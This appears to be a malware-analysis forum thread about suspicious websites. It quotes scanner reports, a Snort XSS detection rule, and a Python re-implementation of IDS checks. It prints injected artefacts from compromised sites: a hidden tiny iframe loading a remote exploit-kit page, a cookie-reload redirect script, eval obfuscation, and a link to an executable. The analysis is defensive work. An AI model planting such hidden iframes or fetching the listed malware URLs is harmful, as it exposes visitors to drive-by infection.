htxp://jsunpack.jeek.org/?report=5c1d23502095b37213748d668ffd099c5248c7d2
Detected as a cross site scripting attack:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:" tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
polonus
Another one: unsure verdict, some IDS alerts, given as with unknown_html_google_malware; IDS (twice): http_inspect: JAVASCRIPT WHITESPACES EXCEEDS MAX ALLOWED (severity 3) see: http://www.snort.org/search/sid/120-10 → Http Inspect will also detect consecutive whitespace and normalize it to a single space. The config option “max_javascript_whitespaces” determines the maximum number of consecutive whitespaces allowed within the Javascript.
Blacklisted - yes: http://quttera.com/detailed_report/www.51-help.com → http://www.yandex.com/infected?url=51-help.com&l10n=en
Security warning according to Sucuri’s: http://sitecheck.sucuri.net/results/www.51-help.com/ /service/index.htm & service/main.htm & solution//index.hrm
hidden iFrames: http://sucuri.net/malware/entry/MW:IFRAME:HD202
See also: http://scanurl.net/?u=http%3A%2F%2Fwww.51-help.com%2F&uesb=Check+This+URL#results
Verdict: Main URL: http://www.51-help.com is suspicious → http://evuln.com/tools/malware-scanner/www.51-help.com/
polonus
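As an added example (not from polonus's posts or the scanners he quotes), the two IDS checks mentioned above re-implemented in Python and run over constructed inputs: the nocase url_content plus url_re match of the XSS rule, and http_inspect-style handling of consecutive JavaScript whitespace (alert when a run exceeds the configured maximum, then collapse runs to a single space). The limit of 200 is an assumed stand-in for the sensor's max_javascript_whitespaces setting.

```python
import re

# Rule 1: the url_content / url_re rule quoted in the thread (case-insensitive).
XSS_URL_CONTENT = "%3CSCRIPT"
XSS_URL_RE = re.compile(r"%3Cscript.*%3E", re.IGNORECASE)


def xss_url_rule(url):
    """True only when both the nocase content match and the regex hit,
    mirroring how the alert needs every option in the rule to match."""
    return XSS_URL_CONTENT in url.upper() and XSS_URL_RE.search(url) is not None


# Rule 2: emulate http_inspect's consecutive-whitespace handling for JavaScript.
WS_RUN = re.compile(r"\s+")


def javascript_whitespace_check(js, max_ws=200):
    """Return (alert, normalized).

    alert      -> True if any whitespace run is longer than max_ws
                  (max_ws=200 is an assumed value, not read from a sensor).
    normalized -> the script with every whitespace run collapsed to one space,
                  which is what http_inspect hands to later rules.
    """
    longest = max((len(m.group()) for m in WS_RUN.finditer(js)), default=0)
    return longest > max_ws, WS_RUN.sub(" ", js)


# Constructed sample inputs (not taken from any of the scanned sites).
SAMPLE_URLS = [
    "http://example.test/search?q=%3Cscript%3Etest%3C/script%3E",  # hits
    "http://example.test/search?q=%3cScRiPt%3e",                    # hits (nocase)
    "http://example.test/search?q=%3CSCRIPT",                       # content only, no %3E
    "http://example.test/search?q=hello",                           # clean
]
SAMPLE_JS = "var a = 1;" + " " * 300 + "eval(a);"  # padded to defeat a naive matcher
RELOAD_JS = "document.cookie='x=1; path=/';window.location.href=window.location.href;"

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(xss_url_rule(u), u)
    print(javascript_whitespace_check(SAMPLE_JS))
    print(javascript_whitespace_check(RELOAD_JS))
```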
Here it is demonstrated how soon the threat landscape can change…
See recent scan, clean: http://urlquery.net/report.php?id=3241197 → http://evuln.com/tools/malware-scanner/canadianhomeleisure.com/
and http://siteinspector.comodo.com/public/reports/15081761
Previous situation with IDS alerts: redkit * malicious iFrame: http://urlquery.net/report.php?id=2572066
Potentially suspicious is /misc/jquery.js?.1.8.8 with Shell upload vulnerabilities
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method eval __tmpvar1755052859 = eval;
packed to save bandwidth…
Found by Quttera's here: http://quttera.com/detailed_report/canadianhomeleisure.com
a WordPress theme hack? http://wordpress.org/support/topic/theme-hacked - posted by iamgiant
The malicious JavaScript detected and identified with redkit iframe=
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2
width=2 src=htxp://decktech.org/chhs.html?j=1286003>
</iframe>
301 Moved Permanently and a 404 Not Found now
src url is blocked by Bitdefender TrafficLight, but given clean here: http://sitecheck.sucuri.net/results/www.decktech.org
On IP now found
|_http-title: Coming Soon page
Running on Apache httpd 2.2 Google Analytics installed: UA-2898485-20
pol
Here we find redirecting to a relative URL in JavaScript: http://urlquery.net/report.php?id=3241686
To see this we explore with jsunpack →
<html><body><script>document.cookie='yyyyyyy=2cab1371yyyyyyy_2cab1371; path=/';window.location.href=window.location.href;</script></body></html>
here document.location.href = '/path'; //relative to domain
is being used.
This is the IDS alert we meet for the URL: http://doc.emergingthreats.net/bin/view/Main/2012593 and http://rules.emergingthreats.net/changelogs/snort-2.4.0.etpro.2011-05-19T22:12:29.txt (source=oinkmaster)
Here we read on the abuse of these Non-chargeable domains by cybercriminals: http://www.spamfighter.com/News-17018-Cyber-criminals-choosing-Non-chargeable-“cems”-Domains-Reports-Zscaler.htm (on spamfighter news)
polonus
See: Up(nil): unknown_exe ARIN US engineering at gnax dot net 64.22.111.82 to 64.22.111.82 jamondetrujillo dot com htxp://www.jamondetrujillo.com/toolbariber34/lentils.exe
https://www.virustotal.com/nl/url/a0c6128b08a676ea2906778fa8b4787ba7e6996b67ef65e0b6bfb475a6baba1f/analysis/ 3 detections
url detected by Bitdefender’s TrafficLight and flagged by WOT → http://urlquery.net/report.php?id=3276569
Seems an overdue! PHISH page…http://www.mywot.com/en/scorecard/64.22.111.82?utm_source=addon&utm_content=popup-donuts
Why? See: http://sameid.net/ip/64.22.111.82/ & http://www.projecthoneypot.org/ip_64.22.111.82
Page has no title and page has no description Text may be too short Spiders see 21 words MZ L This program cannot be run in DOS mode. Yq q q q t p p p Richq PEL D
One potential suspicious here: /plugins/system/rokbox/rokbox.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write __tmpvar446851846 = write;
Threat dump: see: http://jsunpack.jeek.org/?report=e706f5a7e310c8a19e051f958ce70177ebf1ab02 (open with active script blocker and in a VM)
File size[byte]: 20276
File type: ASCII
MD5: A9D7CD66A9C1C6A5995CC9BE2D689331
polonus